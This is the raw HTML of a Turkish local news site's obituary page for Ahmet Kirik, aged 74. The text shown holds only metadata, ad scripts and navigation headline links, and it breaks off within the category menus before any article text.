
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Ahmet Kirik 74 yaşında</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content=""> <meta name="keywords" content="Ahmet Kirik 74 yaşında"> <meta name="news_keywords" content="Ahmet Kirik 74 yaşında"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Ahmet Kirik 74 yaşında"> <meta property="og:description" content=""> <meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/ahmet-kirik-74-yasinda-h68826.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/12/ahmet_kirik_74_yasinda_h68826_94faa.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Ahmet Kirik 74 yaşında"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/ahmet-kirik-74-yasinda-h68826.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Ahmet Kirik 74 yaşında"> <meta name="twitter:description" content=""> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/12/ahmet_kirik_74_yasinda_h68826_94faa.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href="https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/12/ahmet_kirik_74_yasinda_h68826_94faa.jpg" /> <meta itemprop="headline" content="Ahmet Kirik 74 yaşında" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/ahmet_kirik_74_yasinda_h68826_94faa.jpg" /> <meta itemprop="articleSection" content="Vefatlar" name="section" /> <meta itemprop="dateCreated" content="2020-12-29T12:46:21+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/12/ahmet_kirik_74_yasinda_h68826_94faa.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="Ahmet Kirik 74 yaşında" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="pub-3633419220222736" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">7.3871</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">9.0516</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">446.413</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">1460</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/daglarin-susu-olan-yaban-kecileri-icin-envanter-calismasi-baslatildi-h68833.html" title="Dağların süsü olan yaban keçileri için envanter çalışması başlatıldı" >Dağların süsü olan yaban keçileri için envanter çalışması başlatıldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/nurhak-belediyesi-asgari-ucreti-3-bin-100-tl-olarak-acikladi-h68832.html" title="Nurhak Belediyesi, asgari ücreti 3 bin 100 TL olarak açıkladı" >Nurhak Belediyesi, asgari ücreti 3 bin 100 TL olarak açıkladı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/mtv-tutarlari-belli-oldu-h68831.html" title="MTV tutarları belli oldu" >MTV tutarları belli oldu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/hizmet-bulteni-gazetesinin-ucuncu-sayisi-okuyucu-ile-bulustu-h68830.html" title="Hizmet Bülteni Gazetesinin üçüncü sayısı okuyucu ile buluştu" >Hizmet Bülteni Gazetesinin üçüncü sayısı okuyucu ile buluştu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kalbine-yenilen-huseyin-gunes-icin-anma-programi-duzenlendi-h68829.html" title="Kalbine yenilen Hüseyin Güneş için anma programı düzenlendi" >Kalbine yenilen Hüseyin Güneş için anma programı düzenlendi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/cig-sehidi-ali-ozdemir-son-yolculuguna-ugurlandi-h68828.html" title="Çığ şehidi Ali Özdemir son yolculuğuna uğurlandı" >Çığ şehidi Ali Özdemir son yolculuğuna uğurlandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/vefatlar/mustafa-altintop-52-yasinda-h68827.html" title="Mustafa Altıntop 52 yaşında" >Mustafa Altıntop 52 yaşında</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanli-milli-yuzucu-merve-tuncel-dunya-rekorunu-altust-etti-h68824.html" title="Elbistanlı milli yüzücü Merve Tuncel, dünya rekorunu altüst etti" >Elbistanlı milli yüzücü Merve Tuncel, dünya rekorunu altüst etti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-gungorden-elbistan-teskilatina-hayirli-olsun-ziyareti-h68820.html" title="Başkan Güngör’den Elbistan Teşkilatına Hayırlı Olsun Ziyareti" >Başkan Güngör’den Elbistan Teşkilatına Hayırlı Olsun Ziyareti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/emyo-akademik-kadrosunu-guclendiriyor-h68819.html" title="EMYO, akademik kadrosunu güçlendiriyor" >EMYO, akademik kadrosunu güçlendiriyor</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="34721f4cdfedd8241fa682003e7660661fc75e18" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Ahmet Kirik 74 yaşında" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/mustafa-altintop-52-yasinda-h68827.html" title="Mustafa Altıntop 52 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/mustafa_altintop_52_yasinda_h68827_e5ded.jpg" alt="Mustafa Altıntop 52 yaşında" /> Mustafa Altıntop 52 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-kirik-74-yasinda-h68826.html" title="Ahmet Kirik 74 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/ahmet_kirik_74_yasinda_h68826_94faa.jpg" alt="Ahmet Kirik 74 yaşında" /> Ahmet Kirik 74 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/nuh-mavi-h68825.html" title="Nuh Mavi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/nuh_mavi_h68825_f5aa6.jpg" alt="Nuh Mavi" /> Nuh Mavi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/tebernus-picak-78-yasinda-h68823.html" title="Tebernuş Pıçak 78 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/tebernus_picak_78_yasinda_h68823_0a3e2.jpg" alt="Tebernuş Pıçak 78 yaşında" /> Tebernuş Pıçak 78 yaşında</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/daglarin-susu-olan-yaban-kecileri-icin-envanter-calismasi-baslatildi-h68833.html" title="Dağların süsü olan yaban keçileri için envanter çalışması başlatıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/daglarin_susu_olan_yaban_kecileri_icin_envanter_calismasi_baslatildi_h68833_d4b65.jpg" alt="Dağların süsü olan yaban keçileri için envanter çalışması başlatıldı" /> Dağların süsü olan yaban keçileri için envanter çalışması başlatıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/nurhak-belediyesi-asgari-ucreti-3-bin-100-tl-olarak-acikladi-h68832.html" title="Nurhak Belediyesi, asgari ücreti 3 bin 100 TL olarak açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/nurhak_belediyesi_asgari_ucreti_3_bin_100_tl_olarak_acikladi_h68832_0c205.jpg" alt="Nurhak Belediyesi, asgari ücreti 3 bin 100 TL olarak açıkladı" /> Nurhak Belediyesi, asgari ücreti 3 bin 100 TL olarak açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/mtv-tutarlari-belli-oldu-h68831.html" title="MTV tutarları belli oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/mtv_tutarlari_belli_oldu_h68831_4deb9.jpg" alt="MTV tutarları belli oldu" /> MTV tutarları belli oldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/hizmet-bulteni-gazetesinin-ucuncu-sayisi-okuyucu-ile-bulustu-h68830.html" title="Hizmet Bülteni Gazetesinin üçüncü sayısı okuyucu ile buluştu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/hizmet_bulteni_gazetesinin_ucuncu_sayisi_okuyucu_ile_bulustu_h68830_a2f67.jpg" alt="Hizmet Bülteni Gazetesinin üçüncü sayısı okuyucu ile buluştu" /> Hizmet Bülteni Gazetesinin üçüncü sayısı okuyucu ile buluştu</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" /> İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" /> AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" /> Mikrokredi desteği koronavirüs döneminde de devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img 